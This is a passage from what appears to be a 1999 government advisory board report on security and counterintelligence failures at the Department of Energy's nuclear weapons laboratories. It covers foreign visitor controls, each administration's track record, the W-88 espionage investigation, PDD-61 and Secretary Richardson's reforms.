In December 1994, the Department released updated figures for the cumulative amount of MUF or inventory difference for the 50-year period beginning in 1944.
The cumulative figure: 6,174 pounds. Of that amount, a cumulative total of about 10 pounds was ascribed to “accidental losses” and “approved write-offs.”44
GAO has continued to highlight the issue since DOE became the steward of the nation’s nuclear weapons laboratories. GAO published a report in 1991
criticizing the insufficiency of the Department’s measuring systems and handling procedures;45 in 1994, criticizing its methods of tracking exported nuclear material;46
and in 1995, for installing a new system that was allegedly faulty.47
Even if accurate systems of measurement and accounting had been in place, it is not clear whether DOE officials would have been qualified to manage them
effectively. A 1995 report to the President warned that “severe budget reductions, diminished technical resources, increased responsibilities, and reduced mission
training ... have undermined protection of special nuclear material and restricted data.”48
Last year, a report by an external review panel found “a lack of nuclear physical security expertise at all levels in the oversight process; ad hoc structuring of
safeguards and security functions throughout the Department, and placement of oversight functions in positions which constrain their effectiveness.”49
The dispute over the accuracy of nuclear measurements, of course, is beyond the technical capabilities of this panel to resolve. But the panel members do believe that
its persistence, and the low priority given to the issue relative to other DOE scientific goals, is indicative of the institutional attitude that DOE has had toward security:
nonscientists have a poor understanding of all things nuclear, so their judgments about acceptable levels of risk are suspect prima facie.
FOREIGN VISITORS AND ASSIGNMENTS PROGRAM
True to the tradition of international partnership molded by the experiences of the Manhattan Project, the weapons labs have remained a reservoir of the best
international scientific talent. Recent examples abound: a supercomputing team from Oak Ridge National Lab, made up of three PRC citizens and a Hungarian,
recently won the Gordon Bell Prize; a Bulgarian and a Canadian, both world-class scientists, are helping Lawrence Livermore National Lab solve problems in fluid
dynamics; a Spanish scientist, also at Livermore, is collaborating with colleagues on laser propagation.
But for more than a decade, the increasing prominence of foreign visitors in the weapons labs has increased concern about security risks. The PFIAB panel found
that as early as 1985, the DCI raised concerns about the foreign visitors’ program with the Energy Secretary. A year later, researchers conducting an internal DOE
review could find only scant data on the number and composition of foreign nationals at the weapons labs. Although intelligence officials drafted suggestions for
DOE’s foreign visitor control program, PFIAB found little evidence of reform efforts until the tenure of Secretary Watkins.
A 1988 GAO report cited DOE for failing “to obtain timely and adequate information on foreign visitors before allowing them access to the laboratories.” The GAO
found three cases where DOE allowed visitors with questionable backgrounds—possible foreign agents—access to the labs. In addition, the GAO found that about
10 percent of 637 visitors from sensitive countries were associated with foreign organizations suspected of conducting nuclear weapons activities but DOE did not
request background data on them prior to their visit. DOE also had not conducted its own review of the visit and assignment program at the weapons labs despite
the DOE requirement to conduct audits or reviews at a minimum of every five years. Moreover, GAO reported that few post–visit or host reports required by DOE
Order 12402 were submitted within 30 days of the visitors’ departure and some were never completed.50
The following year, DOE revised its foreign visitor policy and commissioned an external study on the extent and significance of the foreign visitor problem. DOE’s
effort to track and vet visitors, however, still lagged well behind the expansion of the visitor program, allowing foreigners with suspicious backgrounds to gain access
to weapons facilities. A study published in June 1990 indicated DOE had a “crippling lack of essential data, most notably no centralized, retrievable listing of foreign
national visitors to government facilities.”51
By September 1992, DOE had instituted Visitor Assignment Management System (VAMS) databases, used to track visitors and assignees requesting to visit DOE.
The system, however, failed to provide links between the labs that could be used for CI analysis and cross-checking of prospective visitors. Moreover, labs
frequently did not even use the database and failed to enter visitor information. Instead, each lab developed its own computer program independently.
Reviews of security determined that, despite an increase of more than 50 percent in foreign visits to the labs from the mid–1980s to the mid–1990s, DOE controls
on foreign visitors actually weakened in two critical areas: screening for visitors that may pose security risks, and monitoring the content of discussions that might
touch on classified information.
In 1994, DOE headquarters delegated greater authority to approve nonsensitive country visitors to the laboratories, approving a partial exception for Los Alamos
and Sandia National Laboratories to forego background checks to help “reduce costs and processing backlogs.” This resulted in almost automatic approval of some
foreign visitors and fewer background checks. The FBI and GAO subsequently found that “questionable visitors, including suspected foreign intelligence agents, had
access to the laboratories without DOE and/or laboratory officials’ advance knowledge of the visitors’ backgrounds.”52
Changes in records checks over the past decade also made it easier for individuals from sensitive countries to gain access to the laboratories. In 1988, for example,
all visitors from Communist countries required records checks regardless of the purpose of the visit. By 1996, records checks were only required for visitors from
sensitive countries who visited secure areas or discussed sensitive subjects.
An internal DOE task force in 1996 determined that the Department’s definitions of sensitive topics were not specific enough to be useful. It directed the DOE office
of intelligence to develop a new methodology for defining sensitive topics, but did not set a due date. The 1996 group also called for a Deputy Secretary–level
review of foreign visits and assignments to be completed by June 1997.53 The PFIAB panel found no evidence to suggest that these tasks were accomplished.
In 1997, GAO found that DOE lacked clear criteria for identifying visits that involve sensitive subjects; U.S. scientists may have discussed sensitive subjects with
foreign nationals without DOE’s knowledge or approval; and the Department’s counterintelligence program had failed to produce comprehensive threat assessments
that would identify likely facilities, technologies, and programs targeted by foreign intelligence.54 The study found that records checks were still not being conducted
regularly on foreign visitors from sensitive countries.55 Last year, 7,600 foreign scientists paid visits to the weapons labs.56 Of that total, about 34 percent were from
countries that are designated “sensitive” by the Department of Energy—meaning they represent a hostile intelligence threat. The GAO reported last year that foreign
nationals had been allowed after-hours and unescorted access to buildings.57
Administration Track Records
CARTER
(Schlesinger: Aug '77-Aug '79; Duncan: Aug '79-Jan '81)
'77 DOE established … First visiting U.S. scientists to China in '79 and '80 face Chinese elicitation effort. …Late 1970s FBI investigates possible espionage
at a lab. …'80 GAO reports on problems safeguarding against the spread of nuclear weapons technology.
REAGAN I
(Edwards: Jan '81-Nov '82; Hodel: Nov '82-Feb '85; Herrington: Feb '85- )
'82 DOE's Inspection and Evaluation program formed …GAO reports safeguards and security of weapons labs not adequate, recommends independent
assessments program. …'83 DOE issues threat guidance to provide a “consistent basis" for identifying vulnerabilities. …Memo to DOE, DOD states President
has "decided to strengthen WH role … concerning the security of U.S. nuclear facilities."… President signs National Security Decision Directive (NSDD) on
DOE security. … DOE Safeguards and Security Steering Group formed at President's direction to oversee fulfillment of physical security improvements …
GAO reports security concerns at Rocky Flats facility. … DOE conducts eight internal security inspections at weapons facilities and DOE HQ; provides
criticisms and recommendations to DOE management. … '84 DOE's Central Training Academy established for protective force personnel.
REAGAN II
(Herrington: Feb '85-Jan '89)
'86 Rep. Dingell letter to President re: lab security vulnerabilities, management problems and lack of confidence in DOE. … Four GAO reports on DOE
security and CI problems … External report requested by DOE finds problems with management of foreign visitors and adequate security. …'87 Three GAO
reports on DOE highlight the transfer of technology to proliferating nations and inefficient security clearance program. …Seven internal DOE security
inspections criticize management and security practices in '87-'88. …DOE initiates the Personnel Security Assurance Program (PSAP) … DOE focuses on
insider protection and strengthens classified document controls. …Three DOE IG reports about security clearance problems from '86-'88. …'88 Intelligence
Community paper reflects concerns with international scientific exchanges at the DOE labs. … President signs NSDD on Nuclear Weapons Safety, Security,
and Control. … FBI detailee to DOE cites inaccessibility to senior DOE managers. …President states "Improved nuclear security is an important legacy for us
to leave the next administration;" DOE official opines that Energy has done "essentially all that can be done against the outsider threat." … Senate Intelligence
Committee staff briefed on CI activities at labs. … Four GAO reports address DOE security and counterintelligence problems, including: major weaknesses in
foreign visitor controls at labs, and foreign agents possibly gaining access to labs.
BUSH
(Watkins: Mar '89-Jan '93)
'89 New Secretary concerned about 1988 GAO criticism of DOE CI/security, defers DOE annual report on security until he reviews issue; NSC concurs. …
GAO finds insufficient control over weapons-related information and technology. …'90 Four IG reports on security … Secretary of Energy Advisory Board
(SEAB) chartered … Interagency CI group prepares assessment of intelligence threat to government facilities from visiting foreign nationals. …GAO cites lack
of clear, concise physical security standards and inconsistent material measurements at labs. … Freeze Task Force critical of split management of classified and
unclassified computer security; finds direction, coordination, conduct and oversight of safeguards and security activities throughout DOE warrant structural
changes. …External CI review highlights DOE's inability to manage comprehensive approach to foreign threat; inadequate oversight, control over secret
document inventory; uncoordinated computer security responsibilities. …'91 Four IG reports criticize security…GAO reports property, classified document
control problems at LLNL; 10,000 documents unaccounted; inability of DOE to track, monitor, and correct security deficiencies … '87, '89, and '91 GAO
reports foreign countries routinely obtaining unclassified but sensitive information that could assist nuclear programs. …Memo to President highlights previous
security problems at DOE, Secretary's efforts to fix the deficiencies. …'92 Two IG reports on security…SSCI-requested CI assessment finds DOE
headquarters lacks authority to direct labs, CI resources, and current threat information. …GAO cites weak internal security oversight controls; incomplete
safeguards and security planning at DOE facilities. …DOE Order on CI issued. …DOE and FBI formalize relationship for conduct of CI activities. …Internal
security report to Secretary finds "personnel are seldom held responsible for their disregard, either intentional or unintentional, of security requirements." …
Another report finds "Problems in management and oversight represent the most significant weakness" for the Department…and "security systems continue to
be plagued with potential single point failures."
ASSESSMENTS
RESPONSIBILITY
While cultural, structural, and historical problems have all figured into the management and security and counterintelligence failures of DOE, they should not be
construed as an excuse for the deplorable irresponsibility within the agency, the pattern of inaction from those charged with implementation of policies, or the
inconsistency of those in leadership positions. The panel identified numerous instances in which individuals were presented with glaring problems yet responded with
foot–dragging, finger–pointing, bland reassurances, obfuscations, and even misrepresentations.
The record of inattention and “false start” reforms goes back to the beginning of DOE. There have been several Presidents; National Security Advisors, Energy
Secretaries, Deputy Secretaries, Assistant Secretaries, and Lab Directors; scores of DOE Office Directors and Lab managers; and a multitude of Energy
Department bureaucrats and Lab scientists who all must shoulder the responsibility and accountability.
As noted above, severe lapses in the security of the nation’s most critical technology, data, and materials were manifest at the creation of the DOE more than 20
years ago. Many, if not most, of the problems were identified repeatedly. Still, reforms flagged amid a lack of discipline and accountability. The fact that virtually
every one of those problems persisted—indeed, many of the problems still exist—indicates a lack of sufficient attention by every President, Energy Secretary, and
Congress.
This determination is in no way a capitulation to the standard of “everyone is responsible, therefore no one is responsible.” Quite the contrary. Even a casual reading
of the open–source reports on the Department’s problems presents one with a compelling narrative of incompetency that should have merited the aggressive action
of the nation’s leadership. Few transgressions could violate the national trust more than inattention to one’s direct responsibility for controlling the technology of
weapons of mass destruction.
The PFIAB panel was not empowered, nor was it charged, to make determinations of whether specific acts of espionage or malfeasance occurred regarding alleged
security lapses at the weapons labs. Nor was it tasked to issue performance appraisals of the various Presidents, Energy Secretaries, or members of the
Congressional leadership during their respective terms in office. However, an inquiry into the extent to which the system of administrative accountability and
responsibility broke down at various times in history has been necessary to fulfill our charter. In fairness, we have tried to examine the nature of the security problems
at DOE’s weapons labs in many respects and at many levels, ranging from the circumstances of individuals and the dynamics of group behavior to the effectiveness
of mid–level management, the clarity of the laws and regulations affecting the Department, and the effectiveness of leadership initiatives.
THE RECORD OF THE CLINTON TEAM
To its credit, in the past two years the Clinton Administration has proposed and begun to implement some of the most far–reaching reforms in DOE’s history. The
1998 Presidential Decision Directive on DOE counterintelligence (PDD-61) and Secretary Richardson’s initiatives are both substantial and positive steps. We offer
an analysis of some of these initiatives, and their likelihood of success, elsewhere in this chapter and elsewhere in this report.
However, the speed and sweep of the Administration’s ongoing response does not absolve it of its responsibility in years past. At the outset of the Clinton
Administration—in 1993, when it inherited responsibility for DOE and the glaring record of mismanagement of the weapons laboratories—the incoming leadership
did not give the security and counterintelligence problems at the labs the priority and attention they warranted. It will be incumbent on the DOE transition team for the
incoming administration in 2001 to pay particular heed to these issues.
While the track record of previous administrations’ responses to DOE’s problems is mixed (see box on previous administrations, on pp. 26-27), the panel members
believe that the gravity of the security and counterintelligence mismanagement at the Department will, and should, overshadow post facto claims of due diligence by
any administration—including the current one. Asserting that the degree of failure or success with DOE from one administration to the next is relative is, one might
say, gilding a figleaf.
The fact is that each successive administration had more evidence of DOE’s systemic failures in hand: the Reagan Administration arrived to find several years’ worth
of troubling evidence from the Carter, Ford, and Nixon years; the evidence had mounted higher by the time that the Bush Administration took over; and higher still
when the Clinton Administration came in. The Clinton Administration has acted forcefully, but it took pressure from below and outside the Administration to get the
attention of the leadership, and there is some evidence to raise questions about whether its actions came later than they should have, given the course of events that
led to the recent flurry of activity.
Clinton Administration Track Record
O’Leary: Jan ’93–Jan ’97
’93 New Secretary works to make labs more open…launches major declassification effort. … DOE ’92 Annual Report to President does not mention
security problems highlighted same year in reports to Secretary. … GAO criticizes DOE’s ineffective management of personnel security cases. …Four IG
reports on security…Internal report to Secretary on computer security uncovers lack of access controls; no configuration management; failure to perform
management reviews. …’94 Three IG reports on security…FBI detailees to DOE recalled because of “lack of control of the CI program by DOE HQ.”
…Internal report finds classified and unclassified information on lab computer network. …GAO reports computer security deficiencies found in 1985 at six
facilities still not fixed. …’95 Four IG reports on security…Congress considers numerous bills between ’95–’99 to abolish DOE. … “Galvin Task Force”
offers SEAB options for change within the labs. … “Walk-in” provides documents containing sensitive U.S. nuclear information. …DOE officials meet with
FBI regarding potential espionage involving nuclear weapons data. …Analysis group formed at DOE to review Chinese weapons program; senior DOE, CIA,
White House officials discuss options. … GAO reports on poor management of nuclear material tracking capabilities …Laboratory Operations (oversight)
Board created. …’96 First three lab-to-lab exchanges between U.S. and China. …Internal DOE report discovers required nuclear material physical
inventories not being performed. … Two IG reports on security…DOE Deputy Secretary directs six “initiatives” to lab directors and field office heads for the
foreign visitors and CI programs (most initiatives ignored after he leaves DOE in 1997).
Pena: Mar ’97–Jun ’98
’97 Mar New Secretary confirmed. … FBI report to Congress and DOE critical of DOE CI capabilities; addresses CI program oversight, foreign visits and
assignments, CI analysis, professional training/CI awareness. … FBI Director personally delivers CI review to Secretary. …Two additional Lab–to–Lab
exchanges held in Beijing. … DOE staff briefs Congressional staff, and NSC, CIA, FBI senior officials on Chinese nuclear program, possible Chinese
espionage before Secretary informed…DOE increases budget for CI in FY 1997, hires more CI professionals. …Inter-agency Working Group reports that
systemic and serious CI and security problems at DOE have been well documented over at least a ten year period … few of the recommendations in the past
studies have been implemented, … A senior CI official states “There is every reason to believe the labs will resist” any outside assistance … National Security
Advisor requests independent assessment of China's nuclear program and the impact of U.S. nuclear information. …Two DOE internal reports cite confusing,
fragmented, dysfunctional security management structure. …External report finds multiple, uncoordinated internal and external oversight activities. …DCI and
FBI Director meet with Secretary to discuss DOE CI problem and reform plan; … meeting notes state “Despite all the studies conducted, experience over time
has shown that DOE’s structure and culture make reform difficult, if not impossible, from within.” … Internal DOE report states “in all candor, we have been
hampered in meeting [the safeguards and security] obligations by organizational obstacles and competing internal interests.” … PDD–61 drafted, coordinated in
inter-agency process. …DOE’s Laboratory Operations Board finds “inefficiencies due to the Department's complicated management structure.” …Peter Lee
(formerly of LLNL) pleads guilty, inter alia, to transmitting classified national defense information to representatives of the PRC in ’85. …GAO finds faulty
procedures for foreign visitor indices checks and controlling dissemination of sensitive information; lack of clear criteria for identifying visits that involve sensitive
subjects; indirect and inconsistent CI funding; DOE CI programs not based on comprehensive assessment of foreign espionage threat. …Institute of Defense
Analyses’ “120 Day Report” finds inadequate management of DOE workforce and confusing chains of command. …’98 Feb. President signs PDD-61.
…External report says DOE management and oversight of security problematic …Security Management Board created by Congress, meets twice in next 18
months…CIA/FBI report provided to Congress on Chinese espionage activities. … Jun 30 Secretary resigns, Deputy designated as Acting Secretary. …
DOE’s 90-day report on CI reveals problems remain regarding separate management of classified and unclassified information. …Lab-to-lab exchange held in
Beijing.
Richardson: Aug ’98 –
’98 Aug 18 New Secretary sworn in …GAO again finds problems in DOE’s foreign visitor program; notes lack of clear procedures for identifying sensitive
subjects. …External report highlights lack of DOE oversight expertise and ad hoc security structure. … Per PDD–61, assessment of the foreign collection
threat against DOE published. …'99 DOE security review finds “unhealthy, adversarial environment of mistrust among DOE security organizations,”
recommends several management process changes …Cox Committee publishes report…Lab-to-Lab exchange held in Beijing. …President directs PFIAB to
review security, CI at labs; directs Intelligence Community to conduct damage assessment of possible security breaches at labs; directs CI community to review
security of nuclear weapons information in USG. …DOE CI Implementation Plan delivered to Secretary. …GAO reports inadequate separation of classified
and unclassified computer networks at same lab in 1988, 1992, 1994, and 1998. … “Chiles Report” describes management problems in nuclear weapons
program. …Internal DOE report highlights computer security problems at a lab. … DOE counterintelligence implementation plan (per PDD–61) issued to labs.
… DOE shuts down all classified computers at LANL, LLNL, and SNL. … DOE holds tri-lab computer security conference. … Secretary announces new
security organization at DOE, to be headed by a “security czar.”
THE 1995 ‘WALK-IN’ DOCUMENT
In 1995, a U.S. intelligence agency obtained information that has come to be called the “walk-in” document. A copy of a classified PRC report, it contains a
discussion of various U.S. nuclear warheads. The PFIAB has carefully reviewed this document, related information, and the circumstances surrounding its delivery.
Serious questions remain as to when it was written, why it was written, and why it was provided to the U.S. We need not resolve these questions.
The document unquestionably contains some information that is still highly sensitive, including descriptions, in varying degrees of specificity, of technical
characteristics of seven U.S. thermonuclear warheads. This information had been widely available within the U.S. nuclear weapons community, including the
weapons labs, other parts of DOE, the Department of Defense, and private contractors, for more than a decade. For example, key technical information concerning
the W–88 warhead had been available to numerous U.S. government and military entities since at least 1983 and could well have come from many organizations
other than the weapons labs.
W-88 INVESTIGATION
Despite the disclosure of information concerning seven warheads, despite the potential that the source or sources of these disclosures were other than the bomb
designers at the national weapons labs, and despite the potential that the disclosures occurred as early as 1982, only one investigation was initiated. That investigation
focused on only one warhead, the W–88, only one category of potential sources—bomb designers at the national labs—and on only a four-year window of
opportunity. It should have been pursued in a more comprehensive manner. The allegations raised in the investigation should still be pursued vigorously. And the
inquiry should be fully explored—regardless of the conclusions that may result.
The episode began as an administrative inquiry conducted by the DOE Office of Energy Intelligence, with limited assistance from the FBI. It developed into an FBI
investigation, which is still under way today. Allegations concerning this case and related activities highlighted the need for improvements in the DOE’s
counterintelligence program, led along the way to the issuance of a Presidential Decision Directive revamping the DOE’s counterintelligence program, formed a
substantial part of the information underlying the Cox Committee’s conclusions on nuclear weapons information, and ultimately led, at least in part, to the President’s
decision to ask this Board to evaluate security and counterintelligence at the DOE’s weapons labs.
It is not within the mandate of our review to solve the W-88 case or any other potential compromises of nuclear weapons information. Further, it is not within our
mandate to conduct a comprehensive and conclusive evaluation of the handling of the W-88 investigation by the DOJ and FBI. In fact, as we understand it, that is
the purpose of a task force recently appointed by the Attorney General. We trust that among the issues that the task force will resolve are:
Whether the FBI committed sufficient resources, including agents with appropriate expertise, and demonstrated a sense of urgency commensurate with
an apparent compromise of classified U.S. nuclear weapons information;
Whether the DOJ Office of Intelligence Policy Review (OIPR) applied an inappropriately high standard to the FBI’s request for electronic surveillance
under the Foreign Intelligence Surveillance Act (FISA);
Whether the FBI provided to DOJ OIPR all U.S. government information relevant to an appropriate evaluation of the FBI’s FISA request;
Why the FBI’s FISA request did not include a request to monitor or search the subject’s workplace computer systems, particularly since an attorney in
the FBI’s General Counsel Office had provided an opinion in 1996 that such monitoring or searching in this case would require FISA authorization;
Why the FBI did not learn until recently that in 1995 the subject had executed a series of waivers authorizing monitoring of his workplace computer
systems;
Whether the FBI adequately raised to the Attorney General the FBI’s concerns over the declination of the FISA request;
Whether communications regarding the subject’s job tenure broke down between DOE, FBI, and Los Alamos;
Whether the DOJ OIPR maintained appropriate records concerning FISA requests that were declined;
Whether the FBI appropriately relied on technical opinions provided by the DOE;
Why DOE, rather than the FBI, conducted the first polygraph examination in this case when the case was an open FBI investigation; and, perhaps most
importantly,
Whether additional cases should be opened to investigate whether the apparent disclosures may have arisen out of organizations other than Los Alamos
lab.
Again, resolving these issues is not within our mandate. It is, however, explicitly within our mandate to identify additional steps that may need to be taken to address
the security and counterintelligence threats to the weapons labs. Also, it is within our standing PFIAB obligation under Executive Order 12863 to assess the
adequacy of counterintelligence activities beyond the labs. In this regard, what we have learned from our limited review of the W-88 case and other cases are
significant lessons that extend well beyond these particular cases. These lessons relate directly to additional steps we believe must be taken to strengthen our
safeguards against current security and foreign intelligence threats. Those steps are discussed further in the Classified Appendix to this report.
We have learned, for example, that under the current personnel security clearance system a person who is under FBI investigation for suspected counterintelligence
activities may sometimes be granted a new or renewed clearance. We also have learned that although the written standards for granting a first clearance and for
renewing an existing clearance may be identical, the actual practice that has developed—certainly within DOE and we strongly suspect elsewhere—is that clearance
renewals will be granted on a lower standard. We find such inconsistency unacceptable. We think it appropriate for the National Security Council to review and
resolve these issues.
We have also learned that the legal weapons designed to fight the counterintelligence battles of the 70s have not necessarily been rigorously adapted to fight the
counterintelligence battles of the 90s (and beyond). For example, with the passage of more than twenty years since the enactment of the Foreign Intelligence
Surveillance Act (FISA) of 1978, it may no longer be adequate to address the counterintelligence threats of the new millennium. We take no position on whether the
statute itself needs to be changed. It may well still be sufficient. However, based on all of the information we have reviewed and the interviews we have conducted,
and without expressing a view as to the appropriateness of the DOJ decision in the W-88 case, we do believe that the Department of Justice may be applying the
FISA in a manner that is too restrictive, particularly in light of the evolution of a very sophisticated counterintelligence threat and the ongoing revolution in information
systems. We also are concerned by the lack of uniform application across the government of various other investigative tools, such as employee waivers that grant
officials appropriate authority to monitor sensitive government computer systems.
Moreover, there does not exist today a systematic process to ensure that the competing interests of law enforcement and national security are appropriately
balanced. Law enforcement, rightly so, is committed to building prosecutable cases. This goal is often furthered by leaving an espionage suspect in place to facilitate
the gathering of more evidence. The national security interest, in contrast, is often furthered by immediately removing a suspect from access to sensitive information to
avoid additional compromises. Striking the proper balance is never easy. It is made all the more difficult when there is no regular process to ensure that balance is
struck. We have learned in our review that this difficult decision often is made by officials who either are too focused on the investigative details or are too unaware
of the details to make a balanced decision. This is another matter deserving National Security Council attention.
PFIAB EVALUATION OF THE INTELLIGENCE
COMMUNITY DAMAGE ASSESSMENT
Following receipt of the “walk-in” document, CIA, DOE, Congress, and others conducted numerous analyses in an effort to determine the extent of the classified
nuclear weapons information the PRC has acquired and the resultant threat to U.S. national security. Opinions expressed in the media and elsewhere have ranged
from one extreme to the other. On one end of the spectrum is the view that the Chinese have acquired very little classified information and can do little with it. On the
other end is the view that the Chinese have nearly duplicated the W-88 warhead.
After reviewing the available intelligence and interviewing the major participants in many of these studies, we conclude that none of these extreme views holds water.
For us, the most accurate assessment of China’s acquisition of classified U.S. nuclear weapons information and the resultant threat to U.S. national security is
presented in the April 1999 Intelligence Community Damage Assessment. Written by a team of experts, this assessment was reviewed and endorsed by an
independent panel of national security and nuclear weapons specialists, chaired by Admiral David Jeremiah. We substantially agree with the assessment’s analysis
and endorse its key findings. The full text of the assessment’s unclassified summary appears in the unclassified appendix.
PRESIDENTIAL DECISION DIRECTIVE 61: BIRTH AND INTENT
In mid-1997, it became clear to an increasingly broader range of senior administration officials that DOE’s counterintelligence program was in serious trouble.[1] In
late July, DOE officials briefed the President’s National Security Advisor, who concluded that, while the real magnitude and national security implications of the
suspected espionage needed closer scrutiny, there was nonetheless a solid basis for taking steps to strengthen counterintelligence measures at the labs. He requested
an independent CIA assessment of China’s nuclear program and the impact of U.S. nuclear information, and he directed that the National Counterintelligence Policy
Board (NACIPB)[2] review the DOE counterintelligence program. That September, the National Security Advisor received the CIA assessment, and the NACIPB
reported back that it had found “systemic and serious CI and security problems at DOE [had] been well documented over at least a ten year period” and “few of the
recommendations in the past studies [had] been implemented.” The NACIPB made 25 recommendations to significantly restructure the DOE CI program; it also
proposed that a Presidential Decision Directive or Executive Order be handed down to effect these changes.
At an October 15 meeting, the Director of Central Intelligence and the FBI Director discussed with Secretary Peña and his Deputy Secretary the need to reform the
DOE CI program. The DCI and FBI Director sought to make clear there was an urgent need to act immediately, and “despite all the studies conducted, experience
over time [had] shown that DOE’s structure and culture make reform difficult, if not impossible, from within.” All agreed to develop an action plan that would serve
as the basis for a Presidential Decision Directive. Several senior officials involved felt that the necessary reforms would—without the mandate of a Presidential
directive—have little hope of overcoming the anticipated bureaucratic resistance, both at DOE headquarters and at the labs. There was a clear fear that, “if the
Secretary spoke, the bureaucracy wouldn’t listen; if the President spoke, the bureaucracy might at least listen.”
That winter, the NSC coordinated a draft PDD between and among the many agencies and departments involved. Serious disagreements arose over several issues,
particularly the creation of independent reporting lines to the Secretary for the Intelligence and Counterintelligence Offices. Also at issue was the subordination of the
CI officers at the labs. Much of the resistance stemmed simply from individuals interested in preserving their turf won in previous DOE bureaucratic battles. After
much bureaucratic maneuvering and even vicious in-fighting, these issues were finally resolved, or so it seemed; and on February 11, 1998, the President signed and
issued the directive as PDD-61.
The full PDD remains classified. An unclassified summary, which contains all significant provisions, is set forth in the unclassified annex. In our view, among the most
significant of the 13 initiatives directed by PDD-61 are:
The CI and foreign intelligence (FI) elements would be reconfigured into two independent offices and report directly to the Secretary of Energy;
The Director of the new Office of CI (OCI) would be a senior executive from the FBI and would have direct access to the Secretary of Energy, the
DCI and the Director of the FBI;
Existing DOE contracts with the labs would be amended to include CI program goals and objectives and performance measures to evaluate
compliance with these contractual obligations, and CI personnel assigned to the labs would have direct access to the lab directors and would
concurrently report to the Director, OCI;
The incoming Director, OCI would prepare a report for the Secretary of Energy ninety days after his arrival that would address progress on the
initiative, a strategic plan for achieving long-term goals, and recommendations on whether and to what extent other organizational changes may be
necessary to strengthen CI; and,
Within 120 days, the Secretary of Energy would advise the Assistant to the President for National Security Affairs on the actions taken and specific
remedies designed to implement this directive.
On April 1, 1998, a senior executive from the FBI assumed his duties as the Director of the OCI, and began his 90-day study. He completed and forwarded it to
the Secretary of Energy on July 1, the day after Secretary Peña resigned. The Acting Secretary led a review of the study and its recommendations. On August 18,
Secretary Richardson was sworn in. On November 13, he submitted the action plan required by the PDD to the National Security Advisor. Secretary Richardson
continued to develop an implementation plan. The completed implementation plan was delivered to Secretary Richardson on February 3, 1999, and issued to the
labs on March 4.
TIMELINESS OF PDD-61
Criticism has been raised that the PDD took too long to be issued and has taken too long to implement. Although the current National Security Advisor was briefed
on counterintelligence concerns by DOE officials in April of 1996, we are not convinced that the briefing provided a sufficient basis to require initiation of a broad
Presidential directive at that time. We are convinced, however, that the July 1997 briefing, which we are persuaded was much more comprehensive, was sufficient to
warrant aggressive White House action. We believe that while the resulting PDD was developed and issued within a customary amount of time, these issues had such
national security gravity that it should have been handled with more dispatch. That there were disagreements over various issues is not surprising; that the DOE
bureaucracy dug in its heels so deeply in resisting clearly needed reform is very disturbing. In fact, we believe that the NACIPB, created by PDD in 1994, was a
critical factor in ram-rodding the PDD through to signature. Before 1994, there was no real structure or effective process for handling these kinds of issues in a
methodical way. Had the new structure not been in place and working, we doubt if the PDD would have made it.
With regard to timeliness of implementation, we have far greater concern. It is not unreasonable to expect that senior DOE officials would require some time to
evaluate the new OCI Director’s 90-day study, and we are aware that Secretary Richardson did not assume his DOE duties until mid-August. However, we find
unacceptable the more than four months that elapsed before DOE advised the National Security Advisor on the actions taken and specific remedies developed to
implement the Presidential directive, particularly one so crucial.
More critically, we are disturbed by bureaucratic foot-dragging and even recalcitrance that ensued after issuance of the Presidential Decision Directive. Severe
disagreements erupted over several issues, including whether the CI program would apply to all of the labs, not just the weapons labs, and the extent to which
polygraph examinations would be used in the personnel security program. We understand that some DOE officials declined to assist in the implementation simply by
declaring that, “It won’t work.” The polygraph program was finally accepted into the DOE’s security reforms only after the National Security Advisor and the DCI
personally interceded. The fact that the Secretary’s implementation plan was not issued to the labs until more than a year after the PDD was issued tells us DOE is
still unconvinced of Presidential authority. We find worrisome the reports of repeated and recent resistance by Office of Management and Budget officials to
requests for funding to implement the counterintelligence reforms mandated by PDD-61. We find vexing the reports we heard of OMB budgeteers lecturing other
government officials on the “unimportance” of counterintelligence at DOE.
SECRETARY RICHARDSON’S INITIATIVES
Since November of 1998 and especially since April of this year, Secretary Richardson has taken commendable steps to address DOE’s security and
counterintelligence deficiencies. In November of last year, in the action plan required by PDD-61, Secretary Richardson detailed 31 actions to be taken to reform
DOE’s counterintelligence program. These actions addressed the structure of the counterintelligence program, selection and training of field counterintelligence
personnel, counterintelligence analysis, counterintelligence and security awareness, protections against potential “insider threats,” computer security, and relationships
with the FBI, the Central Intelligence Agency, and the National Security Agency.
Though many matters addressed in the action plan would require further evaluation before specific actions would be taken, immediate steps included granting to the
Office of Counterintelligence (OCI) direct responsibility for programming and funding counterintelligence activities of all DOE field offices and laboratories; granting
the Director, OCI the sole authority to propose candidates to serve as the counterintelligence officers at the weapons labs; and instituting a policy for a polygraph
program for employees with access to sensitive information.
In April of 1999, in an effort to eliminate multiple reporting channels and improve lines of communications, direction and accountability, Secretary Richardson
ordered changes in the department’s management structure. In short, each of the 11 field offices reports to a Lead Program Secretarial Office (LPSO). The LPSO
has “overall line accountability for site-wide environment, safety and health, for safeguards and security and for the implementation of policy promulgated by
headquarters staff and support functions.” A newly established Field Management Council is to be charged with program integration.
In May of 1999, Secretary Richardson announced substantial restructuring of the security apparatus at DOE. Among these is the new Office of Security and
Emergency Operations, responsible for all safeguards and security policy, cyber-security, and emergency functions throughout DOE. It will report directly to the
Secretary and consist of the Office of the Chief Information Officer, an Office of Emergency Management and Response, and an Office of Security Affairs, which
will include the Office of Safeguards and Security, the Office of Nuclear and National Security Information, the Office of Foreign Visits and Assignments, and the
Office of Plutonium, Uranium, and Special Material Inventory.
Also announced was the creation of the Office of Independent Oversight and Performance Assurance. It also will report directly to the Secretary to provide
independent oversight for safeguards and security, special nuclear materials accountability, and other related areas.
To support additional cyber-security improvements, DOE will be asking Congress for an additional $50 million over the next two years. Improvements are to include
continual monitoring of DOE computers for unauthorized and improper use. New controls will also be placed on computers and workstations, removable media,
removable drives, and other devices that could be used to download files. In addition, warning “banners” are now mandatory on all computer systems to alert users
that these systems are subject to search and review at the government’s discretion. Cyber-security training is also to be improved.
Secretary Richardson further announced additional measures designed to strengthen DOE’s counterintelligence program. They include: a requirement that DOE
officials responsible for maintaining personnel security clearances be notified of any information that might affect the issuance or maintenance of such a clearance,
even when the information does not rise to the level of a criminal charge; and mandatory reporting by all DOE employees of any substantive contact with foreign
nationals from sensitive countries. DOE also plans to strengthen its Security Management Board; accelerate actions necessary to correct deficiencies in security
identified in the 1997/1998 Annual Report to the President on Safeguards and Security; expedite improvements in the physical security of DOE nuclear weapons
sites; and delay the automatic declassification of documents more than 25 years old.
In sum, as of mid-June of 1999, progress has been made in addressing counterintelligence and security. Of note, all of the PDD-61 requirements are reported to
have been substantially implemented. Other important steps also reportedly have been completed. Among these are the assignment of experienced
counterintelligence officers to the weapons labs.
